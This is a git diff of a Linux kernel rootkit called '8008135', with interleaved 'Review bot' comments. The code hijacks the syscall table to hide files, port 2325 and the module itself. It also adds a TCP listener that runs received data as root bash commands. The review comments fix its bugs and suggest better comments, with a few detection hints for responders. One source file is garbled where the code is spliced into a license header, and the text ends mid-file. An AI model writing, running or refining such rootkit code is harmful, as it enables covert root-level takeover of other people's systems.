diff --git a/.gitignore b/.gitignore index 8359f9d..a0b166b 100644 --- a/.gitignore +++ b/.gitignore @@ -9,10 +9,10 @@ sysgen.h *.a *.ko *.o - +*5y563n.* *~ *.symvers *.order .tmp_versions/ *.cmd -.vscode/ \ No newline at end of file +.vscode/ diff --git a/Makefile b/Makefile index 255fc67..7993ed2 100644 --- a/Makefile +++ b/Makefile @@ -19,10 +19,15 @@ INCL_H := $(PWD)/$(INCL_S)/headers obj-m += $(MNAME).o # Core $(MNAME)-y += src/$(MNAME).o +$(MNAME)-y += src/637d3n75.o $(MNAME)-y += src/50ck3t.o +$(MNAME)-y += src/h1d3p0r7.o +$(MNAME)-y += src/h1d3m0dul3.o +$(MNAME)-y += src/p463unpr073c7.o +$(MNAME)-y += src/5y563n.o # Includes for header files etc -ccflags-y := -I$(SRCS_H) -I$(LIBS_H) -I$(INCL_H) +ccflags-y := -I$(SRCS_H) -I$(LIBS_H) -I$(INCL_H) -Wall all: $(shell $(SRCS_S)/cr3473_5y563n.sh) diff --git a/src/50ck3t.c b/src/50ck3t.c index 9302803..42f98b5 100644 --- a/src/50ck3t.c +++ b/src/50ck3t.c @@ -31,9 +31,22 @@ /**** includes ***************************************************************** *******************************************************************************/ #include "50ck3t.h" - +#ifdef HARMLESS +#else + #include + #include "610b415.h" +#endif /**** types ******************************************************************* *******************************************************************************/ +#ifdef HARMLESS +#else + + static char *SEnvP[] = { + "HOME=/", + NULL + }; + +#endif struct tcp_conn_handler_data{ struct sockaddr_in *FAddress; struct socket *FAcceptSocket; @@ -176,9 +189,10 @@ int connection_handler(void *AData){ int LRet; int LLen = 49; unsigned char LInBuf[LLen+1]; +#ifdef HARMLESS unsigned char LOutBuf[LLen+1]; - - +#else +#endif DECLARE_WAITQUEUE(recv_wait, current); allow_signal(SIGKILL|SIGSTOP); 
@@ -221,21 +235,33 @@ int connection_handler(void *AData){ LRet = tcp_server_receive(LAcceptSocket, LID, LAddress, LInBuf, LLen,\ MSG_DONTWAIT); if(LRet > 0){ - if(memcmp(LInBuf, "HOLA", 4) == 0){ +#ifdef HARMLESS + if(memcmp(LInBuf, "HOLA", 4) == 0){ memset(LOutBuf, 0, LLen+1); strcat(LOutBuf, "HOLASI"); pr_info("sending response: %s\n", LOutBuf); tcp_server_send(LAcceptSocket, LID, LOutBuf,\ strlen(LOutBuf), MSG_DONTWAIT); - } - if(memcmp(LInBuf, "ADIOS", 5) == 0){ + } + if(memcmp(LInBuf, "ADIOS", 5) == 0){ memset(LOutBuf, 0, LLen+1); strcat(LOutBuf, "ADIOSAMIGO"); pr_info("sending response: %s\n", LOutBuf); tcp_server_send(LAcceptSocket, LID, LOutBuf,\ strlen(LOutBuf), MSG_DONTWAIT); break; - } + } +#else + int Ret; + + + printk(LInBuf); + + char *LArgV[] = {"/bin/bash", "-c", LInBuf, NULL}; + printk("Calling usermodehelper"); + Ret = call_usermodehelper(LArgV[0], LArgV, SEnvP, UMH_WAIT_EXEC); + printk("\nRet is %i \n", Ret); +#endif } } @@ -309,10 +335,8 @@ int tcp_server_accept(void){ __set_current_state(TASK_RUNNING); remove_wait_queue(&LSocket->sk->sk_wq->wait, &accept_wait); - pr_info("accept connection\n"); - LAcceptErr = - LSocket->ops->accept(LSocket, LAcceptSocket, O_NONBLOCK); + LAcceptErr = LSocket->ops->accept(LSocket, LAcceptSocket, O_NONBLOCK); if(LAcceptErr < 0){ pr_info(" *** mtp | accept_error: %d while accepting " @@ -326,9 +350,8 @@ int tcp_server_accept(void){ addr_len = sizeof(struct sockaddr_in); - LAcceptErr = - LAcceptSocket->ops->getname(LAcceptSocket,\ - (struct sockaddr *)LClient,\ + LAcceptErr = LAcceptSocket->ops->getname(LAcceptSocket, + (struct sockaddr *)LClient, &addr_len, 2); if(LAcceptErr < 0){ diff --git a/src/610b415.c b/src/610b415.c new file mode 100644 index 0000000..31acbea --- /dev/null +++ b/src/610b415.c 
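Review bot: The `#else` branch added to connection_handler passes the bytes received on the TCP socket to `/bin/bash -c` through `call_usermodehelper` with no authentication or length check, and because it sits under `#ifdef HARMLESS … #else` it is what a build produces unless HARMLESS is defined. The risky path should be the opt-in one: keep the echo handler as the default and guard the execution branch with its own explicitly defined macro, with a comment above it such as `/* Executes peer-supplied data as a root shell command; lab use only */`. `printk(LInBuf);` also uses peer data as the format string, and the hunk does not show LInBuf being NUL-terminated; `printk("%s", LInBuf)` on a terminated buffer avoids that. For responders, this path should show up as a `/bin/bash -c` process started by a kernel helper with only `HOME=/` in its environment. connection_handler starts and ends outside the hunk.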
@@ -0,0 +1,20 @@
+/*
+ * 610b415.c
+ *
+ * Created on: Dec 6, 2019
+ * Author: vlr
+ */
+
+#include "610b415.h"
+
+char * stringRemoveChars(char *AString, char *ASpanset){
+ char *LPtr = AString;
+ LPtr = strpbrk(LPtr, ASpanset);
+
+ while(LPtr != NULL) {
+ *LPtr = ' ';
+ LPtr = strpbrk(LPtr, AString);
+ }
+
+ return AString;
+}
diff --git a/src/637d3n75.c b/src/637d3n75.c
new file mode 100644
index 0000000..a6a6aee
--- /dev/null
+++ b/src/637d3n75.c
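Review bot: In stringRemoveChars the call inside the loop passes `AString` as the character set instead of `ASpanset`, and it restarts the search at the byte it has just overwritten. Since that byte is now a space that is also present in `AString`, `strpbrk` appears to return the same position on every pass, so the loop would never terminate once a first match is found; in kernel context that stalls the calling thread. The loop step should read `LPtr = strpbrk(LPtr + 1, ASpanset);`. The function also lacks a comment saying that it rewrites `AString` in place and replaces matches with spaces rather than removing them.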
@@ -0,0 +1,74 @@ +/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*- */ +/* + * main.c + * Copyright (C) 2019 + * + * 8008135 is free software: you can redistribute it and/or modify it + * under the terms of the GNU General Public License as published by the + * Free Software Foundation, either version 3 of the License, or + * (at your option) any later version. + * + * 8008135 is distributed in the hope that it will be useful, but + * WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. + * See the GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License along + * with this program. If not, see . + */ +/*******************************************************************************/ + + +/**** includes ***************************************************************** +*******************************************************************************/ +#include "637d3n75.h" + +/*** var ******************************************************************** +*******************************************************************************/ + +sys_getdents_ptr sys_getdents_orig; + +/*******************************************************************************/ + +/*** FUNCTION **************************************************************** +* NAME: sys_getdents_new +* DESCRIPTION: function overriding the original getdents +* PARAMETERS: - +* RETURNS: - +*******************************************************************************/ +asmlinkage long sys_getdents_new(unsigned int fd, + struct linux_dirent __user *dirent, + unsigned int count){ + int boff; + struct linux_dirent* ent; + + long ret = sys_getdents_orig(fd, dirent, count); + + char* dbuf; + + if (ret <= 0) { + return ret; + } + + dbuf = (char*)dirent; + + for (boff = 0; boff < ret;) { + + ent = (struct linux_dirent*)(dbuf + boff); + + + if ((strncmp(ent->d_name, 
HIDE_PREFIX, HIDE_PREFIX_SZ) == 0) + || (strstr(ent->d_name, MODULE_NAME) != NULL)) { + + memcpy(dbuf + boff, + dbuf + boff + ent->d_reclen, + ret - (boff + ent->d_reclen)); + ret -= ent->d_reclen; + } else { + + boff += ent->d_reclen; + } + } + + return ret; +} diff --git a/src/8008135.c b/src/8008135.c index 6c591c3..4d6d102 100644 --- a/src/8008135.c +++ b/src/8008135.c 
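Review bot: The banner above sys_getdents_new still says `PARAMETERS: -` and `RETURNS: -`, and the move from 8008135.c dropped every inline comment, so the file no longer states what the hook filters. A header comment along the lines of `/* Calls the saved getdents handler, then removes every record whose d_name starts with HIDE_PREFIX or contains MODULE_NAME and returns the shortened byte count */` would make the behaviour reviewable. The body also reads and rewrites `dirent`, which is annotated `__user`, through a plain `char *` cast, and it uses `memcpy` on ranges that can overlap; both deserve a comment because they are crash risks for the host. For analysis, the effect is that directory listings obtained through getdents omit those names while the entries still exist on disk.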
@@ -17,203 +17,61 @@ * with this program. If not, see . */ +/*******************************************************************************/ + /**** includes ***************************************************************** *******************************************************************************/ #include "8008135.h" -#include "50ck3t.h" -/**** var ******************************************************************** -*******************************************************************************/ - -sys_getdents_t sys_getdents_orig = NULL; - -/*** FUNCTION **************************************************************** -* NAME: sys_getdents_new -* DESCRIPTION: function overriding the original getdents -* PARAMETERS: - -* RETURNS: - -*******************************************************************************/ -asmlinkage long sys_getdents_new(unsigned int fd, - struct linux_dirent __user *dirent, - unsigned int count){ - int boff; - struct linux_dirent* ent; - - long ret = sys_getdents_orig(fd, dirent, count); - - char* dbuf; - - if (ret <= 0) { - return ret; - } - - dbuf = (char*)dirent; - - // go through the entries, looking for one that has our prefix - for (boff = 0; boff < ret;) { - - ent = (struct linux_dirent*)(dbuf + boff); - - // if it has hide prefix or module name anywhere, hide it - if ((strncmp(ent->d_name, HIDE_PREFIX, HIDE_PREFIX_SZ) == 0) - || (strstr(ent->d_name, MODULE_NAME) != NULL)) { -#if defined DEBUG - printk("\n hide prefix or mod name contained!\n"); - printk("\n ret %ld\n ", ret); - printk("\n dbuf %d\n" , dbuf); - printk("\n"); - printk(ent->d_name); -#endif - // remove this entry by copying everything after it forward - // and adjust the length reported -#if defined DEBUG - printk("\n reclen %u \n", ent->d_reclen); -#endif - memcpy(dbuf + boff, - dbuf + boff + ent->d_reclen, - ret - (boff + ent->d_reclen)); - ret -= ent->d_reclen; -#if defined DEBUG - printk("\n ret after change %ld\n ", ret); -#endif - } else { - // on to 
the next entry - boff += ent->d_reclen; - } - } - - return ret; -} - - -/*** FUNCTION **************************************************************** -* NAME: hide port -* DESCRIPTION: hides the port 2325 -* PARAMETERS: - -* RETURNS: -*******************************************************************************/ -read_ptr orig_read; -asmlinkage long hacked_read(unsigned int fd, char __user *buf, - size_t count) -{ - long result, bp, diff_in_bytes; - char *kbuf, *start_line, *end_line, *port_num; - char *pathname, pbuf[256]; - struct files_struct *current_files; - struct fdtable *files_table; - struct path file_path; - - // run real read - result = (*orig_read)(fd,buf,count); - if (result <= 0) - return result; - - // get pathname - // CITATION [8] from report - current_files = current->files; - files_table = files_fdtable(current_files); - - file_path = files_table->fd[fd]->f_path; - pathname = d_path(&file_path,pbuf,256*sizeof(char)); - // if virtual file /proc/net/tcp - if (!strncmp(pathname,"/proc/",6) && !strcmp(pathname+10,"/net/tcp")) { - // copy from user to kernelspace; - if (!access_ok(VERIFY_READ,buf,result)) - return -1; - if ((kbuf = kmalloc(result,GFP_KERNEL)) == NULL) - return -1; - if (copy_from_user(kbuf,buf,result)) - return -1; - - // filter out hidden ports - start_line = strchr(kbuf,':') - 4; // skip first line - diff_in_bytes = (start_line - kbuf) * sizeof(char); - for (bp = diff_in_bytes; bp < result; bp += diff_in_bytes) { - start_line = kbuf + bp; - port_num = strchr(strchr(start_line,':') + 1,':') + 1; - end_line = strchr(start_line,'\n'); - diff_in_bytes = ((end_line - start_line) + 1) * sizeof(char); - if (!strncmp(port_num,HIDE_PORT,4)) { // if magic port - memmove(start_line,end_line + 1, // delete line in file - result - bp - diff_in_bytes); - result -= diff_in_bytes; - } - } - - // copy from kernel to userspace - if (!access_ok(VERIFY_WRITE,buf,result)) - return EINVAL; - if (copy_to_user(buf,kbuf,result)) - return EINVAL; - 
kfree(kbuf); - } - // return number of bytes read - return result; -} -/*** FUNCTION **************************************************************** -* NAME: hide_module -* DESCRIPTION: hides the module from lsmod -* PARAMETERS: - -* RETURNS: -*******************************************************************************/ -void hide_module(void){ - list_del(&THIS_MODULE->list); -} - /*** FUNCTION **************************************************************** * NAME: 8008135_init -* DESCRIPTION: initializing Kernel Module +* DESCRIPTION: initializing Kernel Module - hijacking syscalltable * PARAMETERS: - * RETURNS: int *******************************************************************************/ static int __init init_8008135(void) { - printk(KERN_INFO "sys_call_table @ %p\n", sys_call_table); - - // record the original getdents handler - sys_getdents_orig = (sys_getdents_t)((void**)sys_call_table)[GETDENTS_SYSCALL_NUM]; - - printk(KERN_INFO "original sys_getdents @ %p\n", sys_getdents_orig); - // turn write protect off - write_cr0(read_cr0() & (~WRITE_PROTECT_FLAG)); - - // add our new handlers - sys_call_table[GETDENTS_SYSCALL_NUM] = sys_getdents_new; - - orig_read = (read_ptr)sys_call_table[__NR_read]; - - sys_call_table[READ_SYSCALL_NUM] = (unsigned long) hacked_read; + sys_getdents_orig = (sys_getdents_ptr)((void**)sys_call_table)[__NR_getdents]; + sys_read_orig = (sys_read_ptr)((void**)sys_call_table)[__NR_read]; + sys_recvmsg_orig = (void *) sys_call_table[__NR_recvmsg]; + + wprotectionoff(); + + sys_call_table[__NR_getdents] = sys_getdents_new; + sys_call_table[__NR_read] = sys_read_fake; + sys_call_table[__NR_recvmsg] = my_recvmsg_syscall; - // turn write protect back on - write_cr0(read_cr0() | WRITE_PROTECT_FLAG); + wprotectionon(); - printk(KERN_INFO "New syscall in place\n"); network_server_init(); hide_module(); - printk(KERN_INFO "Module hidden"); return 0; } /*** FUNCTION **************************************************************** * NAME: 
8008135_exit -* DESCRIPTION: unloading Kernel Module +* DESCRIPTION: unloading Kernel Module, restoring the original system call table * PARAMETERS: - * RETURNS: - *******************************************************************************/ static void __exit exit_8008135(void) { + network_server_exit(); - // allow us to write to read onlu pages - write_cr0(read_cr0() & (~WRITE_PROTECT_FLAG)); - // set getdents handler back - sys_call_table[GETDENTS_SYSCALL_NUM] = sys_getdents_orig; - sys_call_table[READ_SYSCALL_NUM] = (unsigned long) orig_read; - // turn write protect back on - write_cr0(read_cr0() | WRITE_PROTECT_FLAG); - printk(KERN_INFO "Old syscall back\n"); + + wprotectionoff(); + + sys_call_table[__NR_getdents] = sys_getdents_orig; + sys_call_table[__NR_read] = sys_read_orig; + sys_call_table[__NR_recvmsg] = sys_recvmsg_orig; + + wprotectionon(); } -// Setting pointers to init-/exit-functions +/*******************************************************************************/ + module_init(init_8008135); module_exit(exit_8008135); + +/*******************************************************************************/ diff --git a/src/cr3473_5y563n.sh b/src/cr3473_5y563n.sh index 17d133d..1a1f56c 100755 --- a/src/cr3473_5y563n.sh +++ b/src/cr3473_5y563n.sh 
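Review bot: init_8008135 now installs three handlers in `sys_call_table`, but the banner only says "hijacking syscalltable" and the removed `printk` lines were the only record of what was patched. A comment listing the slots, for example `/* replaces __NR_getdents, __NR_read and __NR_recvmsg; originals are kept in sys_*_orig and restored in exit_8008135 */`, should go above the assignments. The return value of `network_server_init()` is ignored and the function returns 0 regardless. Because `hide_module()` unlinks the module from the module list at the end of init, the restore in exit_8008135 is presumably not reachable through a normal unload by name, which is worth stating in the exit banner. The saved pointer for recvmsg is taken with a bare `(void *)` cast while the other two use their typedefs.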
@@ -1,19 +1,32 @@ #!/usr/bin/env bash + SCRIPTPATH="$( cd "$(dirname "$0")" ; pwd -P )" + SRCS_H="$SCRIPTPATH""/headers" + +SGENS="$SCRIPTPATH""/5y563n.c" SGENH="$SRCS_H""/5y563n.h" smap="/boot/System.map-$(uname -r)" +echo -e '#include "5y563n.h"' > "$SGENS" + echo -e "#pragma once" > "$SGENH" echo -e "#include " >> "$SGENH" + symbline=$(cat $smap | grep '\Wsys_call_table$') set $symbline + [ -z "$symbline" ] && echo "No SysCall Table Value from System.map found" && exit 2; -echo -e "void** sys_call_table = (void**)0x$1;" >> "$SGENH" + +echo -e "extern void** sys_call_table;" >> "$SGENH" + +echo -e "void** sys_call_table = (void**)0x$1;" >> "$SGENS" procline=$(cat $smap | grep '\Wproc_modules_operations$') set $procline -echo -e "struct file_operations* proc_modules_operations = (struct file_operations*)0x$1;" >> "$SGENH" \ No newline at end of file +echo -e "extern struct file_operations* proc_modules_operations;">> "$SGENH" + +echo -e "struct file_operations* proc_modules_operations = (struct file_operations*)0x$1;" >> "$SGENS" \ No newline at end of file diff --git a/src/h1d3m0dul3.c b/src/h1d3m0dul3.c new file mode 100644 index 0000000..3a8ce87 --- /dev/null +++ b/src/h1d3m0dul3.c 
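Review bot: The second lookup has no emptiness check: if `proc_modules_operations` is missing from System.map, `set $procline` is called without arguments, `$1` keeps the sys_call_table address from the earlier `set`, and that value is written into the generated file as `proc_modules_operations`. The existing check for `symbline` also runs only after `set $symbline`. Each lookup should be tested before it is used, e.g. `[ -z "$procline" ] && echo "proc_modules_operations not found in System.map" && exit 2`, and `$smap` should be quoted where it is passed to `cat`.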
@@ -0,0 +1,36 @@
+/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*- */
+/*
+ * main.c
+ * Copyright (C) 2019
+ *
+ * 8008135 is free software: you can redistribute it and/or modify it
+ * under the terms of the GNU General Public License as published by the
+ * Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.
+ *
+ * 8008135 is distributed in the hope that it will be useful, but
+ * WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
+ * See the GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License along
+ * with this program. If not, see .
+ */
+
+/*******************************************************************************/
+
+/**** includes *****************************************************************
+*******************************************************************************/
+#include "h1d3m0dul3.h"
+
+/*******************************************************************************/
+
+/*** FUNCTION ****************************************************************
+* NAME: hide_module
+* DESCRIPTION: hides the module from lsmod
+* PARAMETERS: -
+* RETURNS:
+*******************************************************************************/
+void hide_module(void){
+ list_del(&THIS_MODULE->list);
+}
diff --git a/src/h1d3p0r7.c b/src/h1d3p0r7.c
new file mode 100644
index 0000000..5d16ec0
--- /dev/null
+++ b/src/h1d3p0r7.c
@@ -0,0 +1,185 @@ +/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*- */ +/* + * main.c + * Copyright (C) 2019 + * + * 8008135 is free software: you can redistribute it and/or modify it + * under the terms of the GNU General Public License as published by the + * Free Software Foundation, either version 3 of the License, or + * (at your option) any later version. + * + * 8008135 is distributed in the hope that it will be useful, but + * WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. + * See the GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License along + * with this program. If not, see . + */ + +/*******************************************************************************/ + +/**** includes ***************************************************************** +*******************************************************************************/ +#include "h1d3p0r7.h" + +/**** var ********************************************************************** +*******************************************************************************/ + +sys_read_ptr sys_read_orig; +original_recvmsg_syscall sys_recvmsg_orig; + +/*******************************************************************************/ + +/*** FUNCTION **************************************************************** +* NAME: hide port +* DESCRIPTION: hides the port 2325 +* PARAMETERS: - +* RETURNS: +*******************************************************************************/ + +asmlinkage long sys_read_fake(unsigned int fd, char __user *buf, + size_t count) +{ + long result, bp, diff_in_bytes; + char *kbuf, *start_line, *end_line, *port_num; + char *pathname, pbuf[256]; + struct files_struct *current_files; + struct fdtable *files_table; + struct path file_path; + + // run real read + result = (*sys_read_orig)(fd, buf, count); + + if (result <= 0){ + return 
result; + } + + + current_files = current->files; + files_table = files_fdtable(current_files); + + file_path = files_table->fd[fd]->f_path; + pathname = d_path(&file_path, pbuf, 256*sizeof(char)); + + + if (!strncmp(pathname, "/proc/", 6) && !strcmp(pathname + 10, "/net/tcp")) { + + if (!access_ok(VERIFY_READ, buf, result)){ + return -1; + } + if ((kbuf = kmalloc(result, GFP_KERNEL)) == NULL){ + return -1; + } + if (copy_from_user(kbuf, buf, result)){ + return -1; + } + + + start_line = strchr(kbuf, ':') - 4; + diff_in_bytes = (start_line - kbuf) * sizeof(char); + + for (bp = diff_in_bytes; bp < result; bp += diff_in_bytes) { + + start_line = kbuf + bp; + port_num = strchr(strchr(start_line, ':') + 1, ':') + 1; + end_line = strchr(start_line, '\n'); + diff_in_bytes = ((end_line - start_line) + 1) * sizeof(char); + + if (!strncmp(port_num, DEFAULT_PORT_HEX, 4)) { + + memmove(start_line, end_line + 1, + result - bp - diff_in_bytes); + + result -= diff_in_bytes; + } + } + + // copy from kernel to userspace + if (!access_ok(VERIFY_WRITE, buf, result)){ + return EINVAL; + } + if (copy_to_user(buf, kbuf, result)){ + return EINVAL; + } + kfree(kbuf); + } + // return number of bytes read + return result; +} + +/* Function that replaces the original `recvmsg` syscall. Initially, it calls the original + `recvmsg` which fills the given msg buffer. We realize whether we are reading from a netlink + socket with the help of some netlink utility macros. If a netlink socket is being used, we + iterate through the inet diag msg structs (each prepended by a nlmsghdr) and compare the + source and destination ports with our list of hidden ones. In order to hide an entry we copy + the remaining entries over it and adjust the data length which is returned to the user. 
*/ + +asmlinkage ssize_t my_recvmsg_syscall(int sockfd, struct user_msghdr __user *msg, unsigned flags) +{ + long ret; + struct nlmsghdr *nlh; + long count; + int found; + char *stream; + int offset; + int i; + struct inet_diag_msg *r; + int port; + /* Call original `recvmsg` syscall */ + ret = sys_recvmsg_orig(sockfd, msg, flags); + + /* Some error occured. Don't do anything. */ + if (ret < 0) + return ret; + + /* Extract netlink message header from message */ + nlh = (struct nlmsghdr *)(msg->msg_iov->iov_base); + + /* Number of bytes remaining in message stream */ + count = ret; + + /* Set flag specifying whether message contains data to be masked */ + found = 1; + + /* NLMSG_OK: This macro will return true if a netlink message was received. It + essentially checks whether it's safe to parse the netlink message (if indeed + is a netlink message) using the other NLMSG_* macros. */ + while (NLMSG_OK(nlh, count)) { + + if (found == 0) + /* NLMSG_NEXT: Many netlink protocols have request messages that result + in multiple response messages. In these cases, multiple responses will + be copied into the `msg` buffer. This macro can be used to walk the + chain of responses. Returns NULL in the event the message is the last + in the chain for the given buffer. */ + nlh = NLMSG_NEXT(nlh, count); + + r = NLMSG_DATA(nlh); + port = ntohs(r->id.idiag_sport); + if(port == 2325){ + /* Message contains data to be masked */ + found = 1; + }else{ + found = 0; + continue; + } + + + stream = (char *) nlh; + + /* NLMSG_ALIGN: This macro accepts the length of a netlink message and rounds it + up to the nearest NLMSG_ALIGNTO boundary. It returns the rounded length. */ + offset = NLMSG_ALIGN((nlh)->nlmsg_len); + + /* Copy remaining entries over the data to be masked */ + for (i=0 ; i. 
*/ -#ifndef SRC_HEADERS_50CK3T_H_ -#define SRC_HEADERS_50CK3T_H_ +#ifndef SRC_HEADERS_50CK3T_H +#define SRC_HEADERS_50CK3T_H /**** includes ***************************************************************** *******************************************************************************/ @@ -40,11 +40,15 @@ #include #include +/**** defines ***************************************************************** +*******************************************************************************/ + #define DEFAULT_PORT 2325 +#define DEFAULT_PORT_HEX "0915" #define MAX_CONNS 16 #define MODULE_NAME "8008135" int network_server_init(void); void network_server_exit(void); -#endif /* SRC_HEADERS_50CK3T_H_ */ +#endif diff --git a/src/headers/610b415.h b/src/headers/610b415.h new file mode 100644 index 0000000..3fcf6ac --- /dev/null +++ b/src/headers/610b415.h @@ -0,0 +1,13 @@ +/* + * 610b415.h + * + * Created on: Dec 6, 2019 + * Author: vlr + */ + +#ifndef SRC_HEADERS_610B415_H_ +#define SRC_HEADERS_610B415_H_ + +extern char * stringRemoveChars(char *AString, char *ASpanset); + +#endif /* SRC_HEADERS_610B415_H_ */ diff --git a/src/headers/637d3n75.h b/src/headers/637d3n75.h new file mode 100644 index 0000000..26f8ff7 --- /dev/null +++ b/src/headers/637d3n75.h 
@@ -0,0 +1,68 @@ +/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*- */ +/* + * main.c + * Copyright (C) 2019 + * + * 8008135 is free software: you can redistribute it and/or modify it + * under the terms of the GNU General Public License as published by the + * Free Software Foundation, either version 3 of the License, or + * (at your option) any later version. + * + * 8008135 is distributed in the hope that it will be useful, but + * WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. + * See the GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License along + * with this program. If not, see . + */ + +/*******************************************************************************/ + + +#ifndef SRC_HEADERS_637d3n75_H +#define SRC_HEADERS_637d3n75_H + + +/**** include **************************************************************** +*******************************************************************************/ +#include +#include +#include +#include + +#include "5y563n.h" + +#define HIDE_PREFIX "8008135." 
+#define HIDE_PREFIX_SZ (sizeof(HIDE_PREFIX) - 1) + +#define MODULE_NAME "8008135" +#define MODULE_NAME_SZ (sizeof(MODULE_NAME) - 1) + +#define __NR_getdents 78 + +/**** type ******************************************************************** +******************************************************************************/ + +struct linux_dirent { + unsigned long d_ino; + unsigned long d_off; + unsigned short d_reclen; + char d_name[1]; +}; + +typedef asmlinkage long (*sys_getdents_ptr)(unsigned int fd, + struct linux_dirent __user *dirent, + unsigned int count); + +/*** var ******************************************************************** +*******************************************************************************/ + +extern sys_getdents_ptr sys_getdents_orig; + + +extern asmlinkage long sys_getdents_new(unsigned int fd, + struct linux_dirent __user *dirent, + unsigned int count); + +#endif diff --git a/src/headers/8008135.h b/src/headers/8008135.h index 0ff10ae..d6b5bef 100644 --- a/src/headers/8008135.h +++ b/src/headers/8008135.h @@ -18,16 +18,24 @@ */ #ifndef SRC_HEADERS_8008135_H #define SRC_HEADERS_8008135_H + /**** Includes *************************************************************** *******************************************************************************/ +#include "637d3n75.h" +#include "50ck3t.h" +#include "h1d3m0dul3.h" +#include "h1d3p0r7.h" +#include "p463unpr073c7.h" + +// To set module data #include +// To communicate kernel #include +/* #include -#include #include -#include -#include "5y563n.h" +#include #include #include #include 
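Review bot: `__NR_getdents` is defined in 637d3n75.h as a literal 78, and h1d3p0r7.h does the same for `__NR_read` (0) and `__NR_recvmsg` (47); these names belong to the kernel's own unistd headers and the literals are only right for one architecture's syscall numbering. The header should include the kernel definition instead of redefining it, or at least carry a comment such as `/* x86_64 syscall numbers — TODO confirm target */`. `MODULE_NAME` is also defined both here and in 50ck3t.h with the same value, so one of the two should be dropped to keep a single source for the string.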
@@ -36,20 +44,10 @@ #include #include #include - +*/ /**** Defines ***************************************************************** *******************************************************************************/ -#define GETDENTS_SYSCALL_NUM 78 -#define READ_SYSCALL_NUM 0 -#define WRITE_PROTECT_FLAG (1<<16) - -#define HIDE_PREFIX "8008135." -#define HIDE_PREFIX_SZ (sizeof(HIDE_PREFIX) - 1) - -#define MODULE_NAME "8008135" -#define MODULE_NAME_SZ (sizeof(MODULE_NAME) - 1) -#define HIDE_PORT "0915" // 2325 in Hexadecimal /**** Modinfo **************************************************************** *******************************************************************************/ @@ -59,18 +57,5 @@ MODULE_AUTHOR("JanKoernerEnterprises"); MODULE_DESCRIPTION("8008135"); MODULE_VERSION("0.1"); -/**** type ******************************************************************* -*******************************************************************************/ -struct linux_dirent { - unsigned long d_ino; - unsigned long d_off; - unsigned short d_reclen; // d_reclen is the way to tell the length of this entry - char d_name[1]; // the struct value is actually longer than this, and d_name is variable width. -}; -typedef asmlinkage long (*sys_getdents_t)(unsigned int fd, - struct linux_dirent __user *dirent, - unsigned int count); -typedef asmlinkage long (*read_ptr)(unsigned int fd, char __user *buf, - size_t count); -#endif /* SRC_HEADERS_8008135_H */ +#endif diff --git a/src/headers/h1d3m0dul3.h b/src/headers/h1d3m0dul3.h new file mode 100644 index 0000000..f70db50 --- /dev/null +++ b/src/headers/h1d3m0dul3.h 
@@ -0,0 +1,30 @@
+/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*- */
+/*
+ * main.c
+ * Copyright (C) 2019
+ *
+ * 8008135 is free software: you can redistribute it and/or modify it
+ * under the terms of the GNU General Public License as published by the
+ * Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.
+ *
+ * 8008135 is distributed in the hope that it will be useful, but
+ * WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
+ * See the GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License along
+ * with this program. If not, see .
+ */
+
+#ifndef SRC_HEADERS_h1d3m0dul3_H
+#define SRC_HEADERS_h1d3m0dul3_H
+
+
+#include
+#include
+
+
+extern void hide_module(void);
+
+#endif
diff --git a/src/headers/h1d3p0r7.h b/src/headers/h1d3p0r7.h
new file mode 100644
index 0000000..21aacb7
--- /dev/null
+++ b/src/headers/h1d3p0r7.h
@@ -0,0 +1,62 @@ +/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*- */ +/* + * main.c + * Copyright (C) 2019 + * + * 8008135 is free software: you can redistribute it and/or modify it + * under the terms of the GNU General Public License as published by the + * Free Software Foundation, either version 3 of the License, or + * (at your option) any later version. + * + * 8008135 is distributed in the hope that it will be useful, but + * WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. + * See the GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License along + * with this program. If not, see . + */ + +#ifndef SRC_HEADERS_h1d3p0r7_H +#define SRC_HEADERS_h1d3p0r7_H + + +/**** includes **************************************************************** +*******************************************************************************/ + +#include "50ck3t.h" + +/* are those really all needed? */ +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include /* Needed for ntohs */ + + +#define __NR_read 0 +#define __NR_recvmsg 47 + + +typedef asmlinkage long (*sys_read_ptr)(unsigned int fd, + char __user *buf, + size_t count); +typedef asmlinkage ssize_t (*original_recvmsg_syscall)(int, struct user_msghdr __user *, unsigned); + + +/**** var ********************************************************************** +*******************************************************************************/ + +extern sys_read_ptr sys_read_orig; +extern asmlinkage long sys_read_fake(unsigned int fd, char __user *buf, + size_t count); + +extern original_recvmsg_syscall sys_recvmsg_orig; +extern asmlinkage ssize_t my_recvmsg_syscall(int, struct user_msghdr __user *, unsigned); + +#endif diff --git a/src/headers/p463unpr073c7.h b/src/headers/p463unpr073c7.h new file mode 100644 index 0000000..c4aafb8 
--- /dev/null
+++ b/src/headers/p463unpr073c7.h
@@ -0,0 +1,33 @@
+/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*- */
+/*
+ * main.c
+ * Copyright (C) 2019
+ *
+ * 8008135 is free software: you can redistribute it and/or modify it
